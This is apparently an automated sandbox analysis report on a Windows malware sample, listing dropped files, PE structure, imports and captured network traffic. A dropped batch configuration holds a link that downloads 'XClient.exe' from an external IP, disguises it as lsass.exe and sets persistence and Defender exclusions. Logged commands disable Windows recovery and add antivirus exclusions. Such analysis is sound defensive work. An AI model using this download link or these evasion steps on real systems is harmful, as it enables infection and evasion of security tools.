File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kfrfd5kx.ejy.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lu1xgy5f.pe0.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqnvy0z4.p4a.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2jpeh1v.n44.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvkn4nw5.uam.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rnstznm3.gai.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfslmawy.hss.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y1wmnk0q.vuo.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0teupgb.pqc.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\u32y.bat

Download File

Process:	C:\Windows\System32\curl.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	194
Entropy (8bit):	4.879257771616394
Encrypted:	false
SSDEEP:	6:bDmVdozLoBN13nozI1mVMB2UNSWWKAH5vWWgAor7:bDmVdozLo713nozCDWKAHQWgnr7
MD5:	8124818991B68640A54E765041FDEBE6
SHA1:	B74F3FF9325C6194A04D10F616C7E013F71A9280
SHA-256:	65E3C9CE2743BB1B448575993593B2B00B1BAFFADB7AA2B216F76B87B2170A64
SHA-512:	BA87C475FE56AF3D77C8C7E0ED7CFB206CA5B4C92CAD1A7888435987FF3189A6830674CF674F05D18D988FC6D14290ADA9D3DE94502E13CC2F6B2B6022D0312C
Malicious:	false
Preview:	set "startup=False"..set "registry=True"..set "schtask=True"..set "link=http://185.254.97.190:2024/download/XClient.exe"..set "FileExecutable=lsass.exe"..set "WDexc=True"..set "BlockFolder=True"

C:\Windows\Logs\ReAgent\ReAgent.log

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1817
Entropy (8bit):	4.316612694096695
Encrypted:	false
SSDEEP:	48:3BxBcBxBoBXByBSkB2TE5WHuBFbB4KBMABjdBxByB2:3BxBcBxBoBXByBTB2QwuB9B/BMABZBxp
MD5:	E906DA227540214DEE08247E11FC0396
SHA1:	8A4F92FDD657B7244F7DA6E02A8317BFF28BBE1E
SHA-256:	FD043AB3D0FD1A6276EFA063E9B9FB5C0871B49643EEB9FA6063EB355DEF48A5
SHA-512:	FD778A50F358CAB6E2D5CA2049C228102F2752C14BC5D1CC5E74F809861E74D4B28BC13D48413F4220D2CA59097D5DF7138D042501AE2637CB9BB44D48DCA166
Malicious:	false
Preview:	.2024-10-15 05:26:11, Info [ReAgentc.exe] ------------------------------------------------------..2024-10-15 05:26:11, Info [ReAgentc.exe] -----Executing command line: reagentc.exe /disable-----..2024-10-15 05:26:11, Info [ReAgentc.exe] ------------------------------------------------------..2024-10-15 05:26:11, Info [ReAgentc.exe] Enter WinReUnInstall..2024-10-15 05:26:11, Info [ReAgentc.exe] Update enhanced config info is enabled...2024-10-15 05:26:11, Warning [ReAgentc.exe] Failed to get recovery entries: 0xc0000225..2024-10-15 05:26:11, Info [ReAgentc.exe] winreGetWinReGuid returning 0X490..2024-10-15 05:26:11, Info [ReAgentc.exe] ReAgentConfig::ReadBcdAndUpdateEnhancedConfigInfo WinRE disabled, WinRE Guid could not be determined (0x490) ..2024-10-15 05:26:11, Info [Re

C:\Windows\Panther\UnattendGC\diagerr.xml

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (310)
Category:	dropped
Size (bytes):	50033
Entropy (8bit):	4.883351895223494
Encrypted:	false
SSDEEP:	384:53Iq3Ie3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Ix:5l7ljllllljjllllllllllljjlM
MD5:	05351F08FEB26203D3AA00B511239A36
SHA1:	EBFC67E091A0CC2ACD18B33F4FD0F8C874869A05
SHA-256:	62B687A360B65760F5CCE1378245FDF0B836007A82C1A7956D451A84FF81797B
SHA-512:	2A8AB6F47A84B5D8A9BE5F54CF52463461D138F355A8DD257F2D6A3C5487E2263F18C76D2FA5AF410804AEEEB3BAA404CC59F2B42501898D57D1195C8DE83862
Malicious:	false
Preview:	.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

C:\Windows\Panther\UnattendGC\diagwrn.xml

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (355)
Category:	modified
Size (bytes):	51331
Entropy (8bit):	4.919469059606052
Encrypted:	false
SSDEEP:	384:53Iq3Ir3Iq3IY3Iq3Iq3Iq3Iq3Iq3IY3IY3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3Iq3IY:5lQljllllljjllllllllllljjlr
MD5:	88B3D8C6E92D9CFD246D4DEBCAD84BA7
SHA1:	9A8D07971D69F6CF4D2C91866B0069ABA2B0A751
SHA-256:	AD664DC7F27DDFFAAE344C5E04DE3417BE8224D350B88352C807D6D1A7391EBB
SHA-512:	C73C70C4B7A54D04A7F30BACC6BFDD70496FBD117AD79093310390FB0296403C900C87D21F17DE44DB8000560E36E2478B3798FBA40B5EE3A45D5D1D1BFC2E2E
Malicious:	false
Preview:	.<xml xmlns:s="uuid:BDC6E3F0-6DA3-11d1-A2A3-00AA00C14882". xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882". xmlns:rs="urn:schemas-microsoft-com:rowset". xmlns:z="#RowsetSchema">.<s:Schema id="RowsetSchema">.<s:ElementType name="row" content="eltOnly" rs:updatable="true">.<s:AttributeType name="Cls" rs:number="0">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Sev" rs:number="1">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Maj" rs:number="2">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Min" rs:number="3">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="LN" rs:number="4">.<s:datatype dt:type="int"/>.</s:AttributeType>.<s:AttributeType name="Fil" rs:number="5">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Fun" rs:number="6">.<s:datatype dt:type="string"/>.</s:AttributeType>.<s:AttributeType name="Uid" rs:number="7">.<s:datatype dt:type="int"/>.</s:At

C:\Windows\Panther\UnattendGC\setuperr.log

Download File

Process:	C:\Windows\System32\ReAgentc.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	224
Entropy (8bit):	4.6675554997581195
Encrypted:	false
SSDEEP:	6:Yus/4YxzJ/MPxVZCYt/BMpAQ/N/4BNBAAy:NsgYx9/MZLCISNABfry
MD5:	8C9E4E738BCD055A39C60372BC474781
SHA1:	6E87043BCF62F40A494F12D88FBA6DAF49E68CFE
SHA-256:	069E4BB2CF60A51AAF3E7C1163418E2F635FD16BD3FC7E38DE768451D42F3B36
SHA-512:	AA8AA6650023911CF9FEA04380CB0388F296D5779B3CB7527E37259B7785E4540ED2E94080CD96DFB390E6B006899A698893D88E944DC2084D65FDDC2BAC8ACF
Malicious:	false
Preview:	.2023-10-03 08:57:16, Error [msoobe.exe] COMMIT: failed for plugin LocalUser Plugin with hr=0x80070490..2024-10-15 05:26:11, Error [ReAgentc.exe] WinReUnInstall failed: : 0x2..

\Device\Null

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	818
Entropy (8bit):	5.031269565881937
Encrypted:	false
SSDEEP:	24:nt0vndauz/ko+3bdh5wt0gVuz/ko+3bdh5m:ntics+3OtZs+3U
MD5:	1B17C95ACEA2214190FBBA0E0B616A01
SHA1:	2603D3EACEEC2B225DDF550764789FA3928559F7
SHA-256:	3F24A8E29570B35637C029CD5ACA765776C8F1B5503390C9F1C56E7BEF6F0E51
SHA-512:	D3D29F9BE05C21651F0D09D00AD9E1BC72F48545F86DF26BF648482270BCD202D6BAF4AA832F21010B83E6959381BB516DC44A95CB0E1152D3910932DE28BAFA
Malicious:	false
Preview:	Add-MpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: ..ConfigListExtension...At line:1 char:1..+ Add-MpPreference -ExclusionPath 'D:\'..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..Add-MpPreference : Operation failed with the following error: 0x%1!x!..At line:1 char:1..+ Add-MpPreference -ExclusionPath 'D:\'..+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference.. ..

Static File Info

General

File type:	PE32 executable (console) Intel 80386, for MS Windows
Entropy (8bit):	6.789709471087601
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	nkYzjyrKYK.exe
File size:	95'744 bytes
MD5:	7f5e49656e9ad3806d18f23766f7cad5
SHA1:	593a914acb66225e5b4a813dff2b03f77025ec5a
SHA256:	0f5582439a6cf97fdbc8a7c0037d8ed10ce639c982cd433b83dd4159017fbe62
SHA512:	0dfc359bd82e662a8f1d91a81e9a1a8f30f17c77a5eadcbaaf2619eea537d0e31bd6c1158c25783c7a98b6487198b3ec51b55973c5a4767085195dfdeed2aeb3
SSDEEP:	1536:n7fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIf5wuIGk2AOy:77DhdC6kzWypvaQ0FxyNTBf5Ql
TLSH:	E5937D41F3E102F7EAE2093100B6722F973663389764ACDBC75C2D529913AD5A63D3E9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...].@]...............2.....^...............0....@........................................................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x401000
Entrypoint Section:	.code
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5D40055D [Tue Jul 30 08:52:45 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2c5f2513605e48f2d8ea5440a870cb9e

Entrypoint Preview

Instruction
push 000000ACh
push 00000000h
push 00418068h
call 00007FBCBC69A251h
add esp, 0Ch
push 00000000h
call 00007FBCBC69A24Ah
mov dword ptr [0041806Ch], eax
push 00000000h
push 00001000h
push 00000000h
call 00007FBCBC69A237h
mov dword ptr [00418068h], eax
call 00007FBCBC69A1B1h
mov eax, 0041707Ch
mov dword ptr [0041808Ch], eax
call 00007FBCBC6A3672h
call 00007FBCBC6A33DAh
call 00007FBCBC6A02B8h
call 00007FBCBC69FB3Ch
call 00007FBCBC69F5CFh
call 00007FBCBC69F349h
call 00007FBCBC69E7EDh
call 00007FBCBC69DF6Dh
call 00007FBCBC69A52Fh
call 00007FBCBC6A1F38h
call 00007FBCBC6A09E0h
mov edx, 0041702Eh
lea ecx, dword ptr [00418074h]
call 00007FBCBC69A1C8h
push FFFFFFF5h
call 00007FBCBC69A1D8h
mov dword ptr [00418094h], eax
mov eax, 00000200h
push eax
lea eax, dword ptr [00418110h]
push eax
xor eax, eax
push eax
push 00000015h
push 00000004h
call 00007FBCBC69F592h
push dword ptr [004180F8h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1716c	0xc8	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x17d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x17470	0x23c	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.code	0x1000	0x387e	0x3a00	46da2c5018752470fd3127bf22d63b95	False	0.4595231681034483	data	5.529218938453912	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.text	0x5000	0xd962	0xda00	e1a026e66953c410d7f60b1f1e3c560f	False	0.5144244552752294	data	6.56248809649253	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x33a5	0x3400	a16842a34a5da6feda9533bb3e83c3c1	False	0.8049128605769231	data	7.111835561466389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x17000	0x178c	0x1200	eb1c67bb0421773cd02e232448a45cca	False	0.4029947916666667	data	5.1001395855816964	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x19000	0x17d8	0x1800	370c6bd70e9f7bbb3cea963ae4183ab1	False	0.92529296875	data	7.74434169095475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_RCDATA	0x1921c	0xe	zlib compressed data	1.5714285714285714
RT_RCDATA	0x1922c	0x6	Non-ISO extended-ASCII text, with no line terminators	2.3333333333333335
RT_RCDATA	0x19234	0x133b	data	1.0022344099126548
RT_RCDATA	0x1a570	0x1	very short file (no magic)	9.0
RT_MANIFEST	0x1a574	0x263	XML 1.0 document, ASCII text	0.5319148936170213

Imports

DLL	Import
MSVCRT.dll	memset, wcsncmp, memmove, wcsncpy, wcsstr, _wcsnicmp, _wcsdup, free, _wcsicmp, wcslen, wcscpy, wcscmp, wcscat, memcpy, tolower, malloc
KERNEL32.dll	GetModuleHandleW, HeapCreate, GetStdHandle, SetConsoleCtrlHandler, HeapDestroy, ExitProcess, WriteFile, GetTempFileNameW, LoadLibraryExW, EnumResourceTypesW, FreeLibrary, RemoveDirectoryW, EnumResourceNamesW, GetCommandLineW, LoadResource, SizeofResource, FreeResource, FindResourceW, GetNativeSystemInfo, GetShortPathNameW, GetWindowsDirectoryW, GetSystemDirectoryW, EnterCriticalSection, CloseHandle, LeaveCriticalSection, InitializeCriticalSection, WaitForSingleObject, TerminateThread, CreateThread, GetProcAddress, GetVersionExW, Sleep, WideCharToMultiByte, HeapAlloc, HeapFree, LoadLibraryW, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, PeekNamedPipe, TerminateProcess, GetEnvironmentVariableW, SetEnvironmentVariableW, GetCurrentProcess, DuplicateHandle, CreatePipe, CreateProcessW, GetExitCodeProcess, SetUnhandledExceptionFilter, HeapSize, MultiByteToWideChar, CreateDirectoryW, SetFileAttributesW, GetTempPathW, DeleteFileW, GetCurrentDirectoryW, SetCurrentDirectoryW, CreateFileW, SetFilePointer, TlsFree, TlsGetValue, TlsSetValue, TlsAlloc, HeapReAlloc, DeleteCriticalSection, InterlockedCompareExchange, InterlockedExchange, GetLastError, SetLastError, UnregisterWait, GetCurrentThread, RegisterWaitForSingleObject
USER32.DLL	CharUpperW, CharLowerW, MessageBoxW, DefWindowProcW, DestroyWindow, GetWindowLongW, GetWindowTextLengthW, GetWindowTextW, UnregisterClassW, LoadIconW, LoadCursorW, RegisterClassExW, IsWindowEnabled, EnableWindow, GetSystemMetrics, CreateWindowExW, SetWindowLongW, SendMessageW, SetFocus, CreateAcceleratorTableW, SetForegroundWindow, BringWindowToTop, GetMessageW, TranslateAcceleratorW, TranslateMessage, DispatchMessageW, DestroyAcceleratorTable, PostMessageW, GetForegroundWindow, GetWindowThreadProcessId, IsWindowVisible, EnumWindows, SetWindowPos
GDI32.DLL	GetStockObject
COMCTL32.DLL	InitCommonControlsEx
SHELL32.DLL	ShellExecuteExW, SHGetFolderLocation, SHGetPathFromIDListW
WINMM.DLL	timeBeginPeriod
OLE32.DLL	CoInitialize, CoTaskMemFree
SHLWAPI.DLL	PathAddBackslashW, PathRenameExtensionW, PathQuoteSpacesW, PathRemoveArgsW, PathRemoveBackslashW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 15, 2024 11:26:07.995810032 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:07.995848894 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:07.995932102 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:08.005095005 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:08.005108118 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:08.622097969 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:08.622189999 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:08.629422903 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:08.629431963 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:08.629678965 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:08.634253979 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:08.675446033 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:09.124773979 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:09.124826908 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:09.124876976 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:09.147638083 CEST	49713	443	192.168.2.6	104.26.3.16
Oct 15, 2024 11:26:09.147655010 CEST	443	49713	104.26.3.16	192.168.2.6
Oct 15, 2024 11:26:12.602982998 CEST	49714	2024	192.168.2.6	185.254.97.190
Oct 15, 2024 11:26:12.608150005 CEST	2024	49714	185.254.97.190	192.168.2.6
Oct 15, 2024 11:26:12.608242989 CEST	49714	2024	192.168.2.6	185.254.97.190
Oct 15, 2024 11:26:12.608465910 CEST	49714	2024	192.168.2.6	185.254.97.190
Oct 15, 2024 11:26:12.613540888 CEST	2024	49714	185.254.97.190	192.168.2.6
Oct 15, 2024 11:26:21.086587906 CEST	2024	49714	185.254.97.190	192.168.2.6
Oct 15, 2024 11:26:21.086675882 CEST	49714	2024	192.168.2.6	185.254.97.190
Oct 15, 2024 11:26:21.087284088 CEST	49714	2024	192.168.2.6	185.254.97.190
Oct 15, 2024 11:26:21.092120886 CEST	2024	49714	185.254.97.190	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 15, 2024 11:26:07.979554892 CEST	57975	53	192.168.2.6	1.1.1.1
Oct 15, 2024 11:26:07.990890026 CEST	53	57975	1.1.1.1	192.168.2.6

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Oct 15, 2024 11:26:07.702614069 CEST	192.168.2.6	8.8.8.8	4d5a		Echo
Oct 15, 2024 11:26:07.709218979 CEST	8.8.8.8	192.168.2.6	555a		Echo Reply

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 15, 2024 11:26:07.979554892 CEST	192.168.2.6	1.1.1.1	0x4dcd	Standard query (0)	rentry.co	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
